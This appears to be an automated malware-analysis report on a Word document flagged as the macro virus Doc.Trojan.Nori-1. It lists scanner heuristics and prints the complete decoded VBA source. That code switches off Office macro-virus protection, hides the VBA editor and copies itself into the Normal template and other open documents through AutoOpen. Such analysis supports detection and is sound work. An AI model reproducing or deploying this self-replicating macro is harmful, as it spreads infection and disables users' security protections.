Verdict: MALICIOUS
Risk Score: 228
Heuristics: 5
- ClamAV: Doc.Trojan.Nori-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Nori-1
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION): VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: .DeleteLines 8
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8080 bytes |

SHA-256: 50b5a091f6f5cee4ab646dbb9f6e9a98f8914782018ff8b704d7dfc1f28db34f
Detection: ClamAV: Doc.Trojan.Nori-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Unit"
Sub ToN()
'Iron
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With NormalTemplate.VBProject.VBComponents
'8
Kill (file)
End With
End Sub
Sub ToA()
On Error Resume Next
file = "c:\Iron.tmp"
Un = "Unit"
With ActiveDocument.VBProject.VBComponents
'18
'18
Kill (file)
End With
End Sub
Sub AutoOpen()
On Error Resume Next
If options.VirusProtection Then options.VirusProtection = Not options.VirusProtection
If options.ConfirmConversions Then options.ConfirmConversions = Not options.ConfirmConversions
If options.SaveNormalPrompt Then options.SaveNormalPrompt = Not options.SaveNormalPrompt
file = "c:\Iron.tmp"
Un = "Unit"
If NormalTemplate.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
ActiveDocument.VBProject.VBComponents(Un).Export (file)
With ActiveDocument.VBProject.VBComponents(Un).CodeModule
.DeleteLines 8
.InsertLines 8, " .import (file)"
End With
Call ToN
With ActiveDocument.VBProject.VBComponents(Un).CodeModule
.DeleteLines 8
.InsertLines 8, " '8"
End With
End If
If ActiveDocument.VBProject.VBComponents.Item(Un).CodeModule.Lines(2, 1) <> "'Iron" Then
NormalTemplate.VBProject.VBComponents(Un).Export (file)
With NormalTemplate.VBProject.VBComponents(Un).CodeModule
.DeleteLines 18
.InsertLines 18, " ActiveDocument.VBProject.VBComponents.import (file)"
End With
Call ToA
With NormalTemplate.VBProject.VBComponents(Un).CodeModule
.DeleteLines 18
.InsertLines 18, " '18"
End With
NormalTemplate.Save
End If
End Sub
Sub ViewVBCode()
On Error Resume Next
Application.ShowVisualBasicEditor = False
End Sub
Private Sub Document_New()
Call AutoOpen
End Sub